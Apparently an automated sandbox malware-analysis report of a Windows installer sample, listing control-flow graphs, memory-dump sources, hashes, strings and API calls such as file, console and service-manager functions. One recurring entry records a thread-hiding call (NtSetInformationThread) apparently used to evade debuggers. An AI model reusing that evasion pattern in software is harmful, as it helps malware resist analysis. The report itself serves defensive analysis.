                        control_flow_graph 4919 6c8e3886-6c8e388e 4920 6c8e3894-6c8e3896 4919->4920 4921 6c8e3970-6c8e397d 4919->4921 4920->4921 4924 6c8e389c-6c8e38b9 4920->4924 4922 6c8e397f-6c8e3989 4921->4922 4923 6c8e39f1-6c8e39f8 4921->4923 4922->4924 4925 6c8e398f-6c8e3994 4922->4925 4926 6c8e39fe-6c8e3a03 4923->4926 4927 6c8e3ab5-6c8e3aba 4923->4927 4928 6c8e38c0-6c8e38c1 4924->4928 4930 6c8e399a-6c8e399f 4925->4930 4931 6c8e3b16-6c8e3b18 4925->4931 4932 6c8e3a09-6c8e3a2f 4926->4932 4933 6c8e38d2-6c8e38d4 4926->4933 4927->4924 4929 6c8e3ac0-6c8e3ac7 4927->4929 4934 6c8e395e 4928->4934 4929->4928 4936 6c8e3acd-6c8e3ad6 4929->4936 4937 6c8e383b-6c8e3855 call 6ca318a0 call 6ca318b0 4930->4937 4938 6c8e39a5-6c8e39bf 4930->4938 4931->4928 4939 6c8e38f8-6c8e3955 4932->4939 4940 6c8e3a35-6c8e3a3a 4932->4940 4941 6c8e3957-6c8e395c 4933->4941 4935 6c8e3960-6c8e3964 4934->4935 4943 6c8e396a 4935->4943 4944 6c8e3860-6c8e3885 4935->4944 4936->4931 4945 6c8e3ad8-6c8e3aeb 4936->4945 4937->4944 4946 6c8e3a5a-6c8e3a5d 4938->4946 4939->4941 4947 6c8e3b1d-6c8e3b22 4940->4947 4948 6c8e3a40-6c8e3a57 4940->4948 4941->4934 4950 6c8e3ba1-6c8e3bb6 4943->4950 4944->4919 4945->4939 4951 6c8e3af1-6c8e3af8 4945->4951 4955 6c8e3aa9-6c8e3ab0 4946->4955 4953 6c8e3b49-6c8e3b50 4947->4953 4954 6c8e3b24-6c8e3b44 4947->4954 4948->4946 4962 6c8e3bc0-6c8e3bda call 6ca318a0 call 6ca318b0 4950->4962 4957 6c8e3afa-6c8e3aff 4951->4957 4958 6c8e3b62-6c8e3b85 4951->4958 4953->4928 4961 6c8e3b56-6c8e3b5d 4953->4961 4954->4955 4955->4935 4957->4941 4958->4939 4966 6c8e3b8b 4958->4966 4961->4935 4970 6c8e3be0-6c8e3bfe 4962->4970 4966->4950 4973 6c8e3e7b 4970->4973 4974 6c8e3c04-6c8e3c11 4970->4974 4975 6c8e3e81-6c8e3ee0 call 6c8e3750 GetCurrentThread NtSetInformationThread 4973->4975 4976 6c8e3c17-6c8e3c20 4974->4976 4977 6c8e3ce0-6c8e3cea 4974->4977 4991 6c8e3eea-6c8e3f04 call 6ca318a0 call 6ca318b0 4975->4991 4979 6c8e3c26-6c8e3c2d 4976->4979 4980 6c8e3dc5 4976->4980 4981 6c8e3cec-6c8e3d0c 4977->4981 4982 6c8e3d3a-6c8e3d3c 4977->4982 4987 6c8e3dc3 4979->4987 4988 6c8e3c33-6c8e3c3a 4979->4988 4986 6c8e3dc6 4980->4986 4989 6c8e3d90-6c8e3d95 4981->4989 4983 6c8e3d3e-6c8e3d45 4982->4983 4984 6c8e3d70-6c8e3d8d 4982->4984 4990 6c8e3d50-6c8e3d57 4983->4990 4984->4989 4996 6c8e3dc8-6c8e3dcc 4986->4996 4987->4980 4994 6c8e3e26-6c8e3e2b 4988->4994 4995 6c8e3c40-6c8e3c5b 4988->4995 4992 6c8e3dba-6c8e3dc1 4989->4992 4993 6c8e3d97-6c8e3db8 4989->4993 4990->4986 5013 6c8e3f75-6c8e3fa1 4991->5013 4992->4987 4998 6c8e3dd7-6c8e3ddc 4992->4998 4993->4980 4999 6c8e3c7b-6c8e3cd0 4994->4999 5000 6c8e3e31 4994->5000 5001 6c8e3e1b-6c8e3e24 4995->5001 4996->4970 5002 6c8e3dd2 4996->5002 5005 6c8e3dde-6c8e3e17 4998->5005 5006 6c8e3e36-6c8e3e3d 4998->5006 4999->4990 5000->4962 5001->4996 5003 6c8e3e76-6c8e3e79 5001->5003 5002->5003 5003->4975 5005->5001 5009 6c8e3e3f-6c8e3e5a 5006->5009 5010 6c8e3e5c-6c8e3e5f 5006->5010 5009->5001 5010->4999 5011 6c8e3e65-6c8e3e69 5010->5011 5011->4996 5011->5003 5017 6c8e3fa3-6c8e3fa8 5013->5017 5018 6c8e4020-6c8e4026 5013->5018 5021 6c8e3fae-6c8e3fcf 5017->5021 5022 6c8e407c-6c8e4081 5017->5022 5019 6c8e402c-6c8e403c 5018->5019 5020 6c8e3f06-6c8e3f35 5018->5020 5025 6c8e403e-6c8e4058 5019->5025 5026 6c8e40b3-6c8e40b8 5019->5026 5024 6c8e3f38-6c8e3f61 5020->5024 5023 6c8e40aa-6c8e40ae 5021->5023 5022->5023 5027 6c8e4083-6c8e408a 5022->5027 5028 6c8e3f6b-6c8e3f6f 5023->5028 5029 6c8e3f64-6c8e3f67 5024->5029 5030 6c8e405a-6c8e4063 5025->5030 5026->5021 5032 6c8e40be-6c8e40c9 5026->5032 5027->5024 5031 6c8e4090 5027->5031 5028->5013 5034 6c8e3f69 5029->5034 5035 6c8e4069-6c8e406c 5030->5035 5036 6c8e40f5-6c8e413f 5030->5036 5031->4991 5037 6c8e40a7 5031->5037 5032->5023 5033 6c8e40cb-6c8e40d4 5032->5033 5033->5037 5038 6c8e40d6-6c8e40f0 5033->5038 5034->5028 5040 6c8e4144-6c8e414b 5035->5040 5041 6c8e4072-6c8e4077 5035->5041 5036->5034 5037->5023 5038->5030 5040->5028 5041->5029
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1b4de46a3ff3d18cc44b4ebc491aba9cd0fe1ec4f08857f92ac5f81b1163748
                        • Instruction ID: a0cb5846d0b672def97a661457d4aba508d96f1b6c749f7b6a34febe9c0e192d
                        • Opcode Fuzzy Hash: b1b4de46a3ff3d18cc44b4ebc491aba9cd0fe1ec4f08857f92ac5f81b1163748
                        • Instruction Fuzzy Hash: 3C32D432245B018FC334CF28C9D0695B7E3EFDA3147698E6CC0AA5BA65D775B84ACB50
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 27e05e697439aea44b8f0d9db73c416200fa61c6b67fe42c2ad4a1a33378a5e0
                        • Instruction ID: d3c61a45ede113231b6829f7b0d504ac50830a681b93a1c9ef643d98ee5e58b9
                        • Opcode Fuzzy Hash: 27e05e697439aea44b8f0d9db73c416200fa61c6b67fe42c2ad4a1a33378a5e0
                        • Instruction Fuzzy Hash: 5951CF316447018FC3308F28C984795B7A3AFDA314F698E5DC0AA5BAA5DB74B94A8B41
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 385b30ec324be3640736d8f78b9ec0b5552eb9b64d8085f045dcaced8c4d9f74
                        • Instruction ID: 7f2dcb840583cd90303bd0e16b70a301a3ca34d8e28d3280112699167d5cfdfd
                        • Opcode Fuzzy Hash: 385b30ec324be3640736d8f78b9ec0b5552eb9b64d8085f045dcaced8c4d9f74
                        • Instruction Fuzzy Hash: 0B51D131504B118BC330CF28C580795B7A3BFDA314F698E5DC0EA5BAA5DB70BD4A8B91
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6C8E3E9D
                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C8E3EAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Thread$CurrentInformation
                        • String ID:
                        • API String ID: 1650627709-0
                        • Opcode ID: fa962042944d9f9b2fecbe7c05dfff6d424e5ef20e9e8732585b1bda32f3482e
                        • Instruction ID: 7dc9c89aa7d44e7c61c774842e51d3c1df9760176395f5ef9be5e28545b25dde
                        • Opcode Fuzzy Hash: fa962042944d9f9b2fecbe7c05dfff6d424e5ef20e9e8732585b1bda32f3482e
                        • Instruction Fuzzy Hash: 41312031605B058BD730CF68C9947C6B7A2AFDA314F298E1CC0AA5BA90DB7478098B51
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6C8E3E9D
                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C8E3EAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Thread$CurrentInformation
                        • String ID:
                        • API String ID: 1650627709-0
                        • Opcode ID: 365c34810e4b73118ac95218dc8a1a0a4f4d8c8a33955432983f3283c1b69468
                        • Instruction ID: 2cece8ada5d79f6bd8b27793f3bdd7128046367c62c502c48e47873c8fd92764
                        • Opcode Fuzzy Hash: 365c34810e4b73118ac95218dc8a1a0a4f4d8c8a33955432983f3283c1b69468
                        • Instruction Fuzzy Hash: 4B312331104705CBD734CF68C594796B7B2AF9B304F294E5CC0EA5BA91DB71B849CB52
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6C8E3E9D
                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C8E3EAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Thread$CurrentInformation
                        • String ID:
                        • API String ID: 1650627709-0
                        • Opcode ID: 443e47deb56817339440dbedf036c5de8a1fd89ce6a369f4c540c41b8154cdcc
                        • Instruction ID: 5c37a64ba6db5014913738e65ecaae86c3ac65a2074f94d4afce639650036a0f
                        • Opcode Fuzzy Hash: 443e47deb56817339440dbedf036c5de8a1fd89ce6a369f4c540c41b8154cdcc
                        • Instruction Fuzzy Hash: 7621F730618705CBD734CF64C99479677B2AF8B305F544E6DC0AA87A90DB74AD088B52
                        APIs
                        • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CA63F40
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ManagerOpen
                        • String ID:
                        • API String ID: 1889721586-0
                        • Opcode ID: 7de2fb860ac89956437c6379ceacb23762b9f84c5a87142c833709a1950458b8
                        • Instruction ID: 5be8328ef8c4bbb6dc69e5c7f823bcd8f6f80168a137b133aff3ead7cc986875
                        • Opcode Fuzzy Hash: 7de2fb860ac89956437c6379ceacb23762b9f84c5a87142c833709a1950458b8
                        • Instruction Fuzzy Hash: 4C311874609342AFD700CF2AC888A1ABBF1AF85754F14885DF4D9CB6A1C375D885CB63
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p
                        • API String ID: 0-2001680094
                        • Opcode ID: 780b21d9cf46ae9c3eabc8d9ba686185eb1ee4cd20918b5f4f9021f33bc91998
                        • Instruction ID: 1df2473056c876070528b78b345ca61609440f0edebec7bf4af6641f214f8981
                        • Opcode Fuzzy Hash: 780b21d9cf46ae9c3eabc8d9ba686185eb1ee4cd20918b5f4f9021f33bc91998
                        • Instruction Fuzzy Hash: 0CA2927460D3918FCB24CF58C4A069ABBE2ABD9318F189D1EF498C7791D734D8868B53

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3914 6ca7b8f3-6ca7b903 3915 6ca7b905-6ca7b918 call 6ca6e7ff call 6ca6e7ec 3914->3915 3916 6ca7b91d-6ca7b91f 3914->3916 3930 6ca7bc9c 3915->3930 3918 6ca7b925-6ca7b92b 3916->3918 3919 6ca7bc84-6ca7bc91 call 6ca6e7ff call 6ca6e7ec 3916->3919 3918->3919 3922 6ca7b931-6ca7b957 3918->3922 3937 6ca7bc97 call 6ca6ef40 3919->3937 3922->3919 3925 6ca7b95d-6ca7b966 3922->3925 3928 6ca7b980-6ca7b982 3925->3928 3929 6ca7b968-6ca7b97b call 6ca6e7ff call 6ca6e7ec 3925->3929 3933 6ca7bc80-6ca7bc82 3928->3933 3934 6ca7b988-6ca7b98b 3928->3934 3929->3937 3936 6ca7bc9f-6ca7bca2 3930->3936 3933->3936 3934->3933 3935 6ca7b991-6ca7b995 3934->3935 3935->3929 3939 6ca7b997-6ca7b9ae 3935->3939 3937->3930 3942 6ca7b9b0-6ca7b9b3 3939->3942 3943 6ca7b9ff-6ca7ba05 3939->3943 3945 6ca7b9b5-6ca7b9be 3942->3945 3946 6ca7b9c3-6ca7b9c9 3942->3946 3947 6ca7ba07-6ca7ba11 3943->3947 3948 6ca7b9cb-6ca7b9e2 call 6ca6e7ff call 6ca6e7ec call 6ca6ef40 3943->3948 3949 6ca7ba83-6ca7ba93 3945->3949 3946->3948 3950 6ca7b9e7-6ca7b9fa 3946->3950 3952 6ca7ba13-6ca7ba15 3947->3952 3953 6ca7ba18-6ca7ba36 call 6ca73615 call 6ca735db * 2 3947->3953 3980 6ca7bbb7 3948->3980 3954 6ca7ba99-6ca7baa5 3949->3954 3955 6ca7bb58-6ca7bb61 call 6ca80805 3949->3955 3950->3949 3952->3953 3984 6ca7ba53-6ca7ba7c call 6ca79a89 3953->3984 3985 6ca7ba38-6ca7ba4e call 6ca6e7ec call 6ca6e7ff 3953->3985 3954->3955 3958 6ca7baab-6ca7baad 3954->3958 3969 6ca7bbd4 3955->3969 3970 6ca7bb63-6ca7bb75 3955->3970 3958->3955 3962 6ca7bab3-6ca7bad7 3958->3962 3962->3955 3966 6ca7bad9-6ca7baef 3962->3966 3966->3955 3971 6ca7baf1-6ca7baf3 3966->3971 3973 6ca7bbd8-6ca7bbf0 ReadFile 3969->3973 3970->3969 3975 6ca7bb77-6ca7bb86 GetConsoleMode 3970->3975 3971->3955 3976 6ca7baf5-6ca7bb1b 3971->3976 3978 6ca7bbf2-6ca7bbf8 3973->3978 3979 6ca7bc4c-6ca7bc57 GetLastError 3973->3979 3975->3969 3981 6ca7bb88-6ca7bb8c 3975->3981 3976->3955 3983 6ca7bb1d-6ca7bb33 3976->3983 3978->3979 3988 6ca7bbfa 3978->3988 3986 6ca7bc70-6ca7bc73 3979->3986 3987 6ca7bc59-6ca7bc6b call 6ca6e7ec call 6ca6e7ff 3979->3987 3982 6ca7bbba-6ca7bbc4 call 6ca735db 3980->3982 3981->3973 3989 6ca7bb8e-6ca7bba8 ReadConsoleW 3981->3989 3982->3936 3983->3955 3995 6ca7bb35-6ca7bb37 3983->3995 3984->3949 3985->3980 3992 6ca7bbb0-6ca7bbb6 call 6ca6e812 3986->3992 3993 6ca7bc79-6ca7bc7b 3986->3993 3987->3980 3999 6ca7bbfd-6ca7bc0f 3988->3999 3990 6ca7bbaa GetLastError 3989->3990 3991 6ca7bbc9-6ca7bbd2 3989->3991 3990->3992 3991->3999 3992->3980 3993->3982 3995->3955 4002 6ca7bb39-6ca7bb53 3995->4002 3999->3982 4006 6ca7bc11-6ca7bc15 3999->4006 4002->3955 4010 6ca7bc17-6ca7bc27 call 6ca7bd1e 4006->4010 4011 6ca7bc2e-6ca7bc39 4006->4011 4020 6ca7bc2a-6ca7bc2c 4010->4020 4013 6ca7bc45-6ca7bc4a call 6ca7bfd6 4011->4013 4014 6ca7bc3b call 6ca7bca3 4011->4014 4021 6ca7bc40-6ca7bc43 4013->4021 4014->4021 4020->3982 4021->4020
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8Q
                        • API String ID: 0-4022487301
                        • Opcode ID: 1696df71791dd41b5d61db2045397583786732a8fb11850766e92b9a91448789
                        • Instruction ID: aabc268423b2e32fd928f17608dbfcd85f705f1b9442e419438805e6023ab003
                        • Opcode Fuzzy Hash: 1696df71791dd41b5d61db2045397583786732a8fb11850766e92b9a91448789
                        • Instruction Fuzzy Hash: 19C10CB8E042499FDF15CF99D880BEEBBB0BF49314F144255E910ABB81CB309985CB71

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4023 6ca82e8c-6ca82ebc call 6ca8330c 4026 6ca82ebe-6ca82ec9 call 6ca6e7ff 4023->4026 4027 6ca82ed7-6ca82ee3 call 6ca8042c 4023->4027 4032 6ca82ecb-6ca82ed2 call 6ca6e7ec 4026->4032 4033 6ca82efc-6ca82f45 call 6ca83277 4027->4033 4034 6ca82ee5-6ca82efa call 6ca6e7ff call 6ca6e7ec 4027->4034 4044 6ca831b1-6ca831b5 4032->4044 4042 6ca82fb2-6ca82fbb GetFileType 4033->4042 4043 6ca82f47-6ca82f50 4033->4043 4034->4032 4048 6ca82fbd-6ca82fee GetLastError call 6ca6e812 CloseHandle 4042->4048 4049 6ca83004-6ca83007 4042->4049 4046 6ca82f52-6ca82f56 4043->4046 4047 6ca82f87-6ca82fad GetLastError call 6ca6e812 4043->4047 4046->4047 4052 6ca82f58-6ca82f85 call 6ca83277 4046->4052 4047->4032 4048->4032 4060 6ca82ff4-6ca82fff call 6ca6e7ec 4048->4060 4050 6ca83009-6ca8300e 4049->4050 4051 6ca83010-6ca83016 4049->4051 4056 6ca8301a-6ca83068 call 6ca805d0 4050->4056 4051->4056 4057 6ca83018 4051->4057 4052->4042 4052->4047 4066 6ca8306a-6ca83076 call 6ca83486 4056->4066 4067 6ca83087-6ca830af call 6ca83530 4056->4067 4057->4056 4060->4032 4066->4067 4074 6ca83078 4066->4074 4072 6ca830b1-6ca830b2 4067->4072 4073 6ca830b4-6ca830f5 4067->4073 4075 6ca8307a-6ca83082 call 6ca7a745 4072->4075 4076 6ca83116-6ca83124 4073->4076 4077 6ca830f7-6ca830fb 4073->4077 4074->4075 4075->4044 4080 6ca8312a-6ca8312e 4076->4080 4081 6ca831af 4076->4081 4077->4076 4079 6ca830fd-6ca83111 4077->4079 4079->4076 4080->4081 4083 6ca83130-6ca83163 CloseHandle call 6ca83277 4080->4083 4081->4044 4086 6ca83165-6ca83191 GetLastError call 6ca6e812 call 6ca8053f 4083->4086 4087 6ca83197-6ca831ab 4083->4087 4086->4087 4087->4081
                        APIs
                          • Part of subcall function 6CA83277: CreateFileW.KERNEL32(00000000,00000000,?,6CA82F35,?,?,00000000,?,6CA82F35,00000000,0000000C), ref: 6CA83294
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA82FA0
                        • __dosmaperr.LIBCMT ref: 6CA82FA7
                        • GetFileType.KERNEL32(00000000), ref: 6CA82FB3
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA82FBD
                        • __dosmaperr.LIBCMT ref: 6CA82FC6
                        • CloseHandle.KERNEL32(00000000), ref: 6CA82FE6
                        • CloseHandle.KERNEL32(6CA79EF0), ref: 6CA83133
                        • GetLastError.KERNEL32 ref: 6CA83165
                        • __dosmaperr.LIBCMT ref: 6CA8316C
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: 8Q
                        • API String ID: 4237864984-4022487301
                        • Opcode ID: 5056748a0373fbd51b0e714bd7e22e0fb3961592f027daa4e17324257eed3b33
                        • Instruction ID: 1bc522164ab2f343b7cc8e48094759440b56b32dea5e8494e049d112f5d39e91
                        • Opcode Fuzzy Hash: 5056748a0373fbd51b0e714bd7e22e0fb3961592f027daa4e17324257eed3b33
                        • Instruction Fuzzy Hash: 9AA14532A161458FCF099F68CC957EE7BB0AB07328F18025DE851AF7D0CB35899AC761

                        Control-flow Graph

                        • Executed
                        • Not Executed
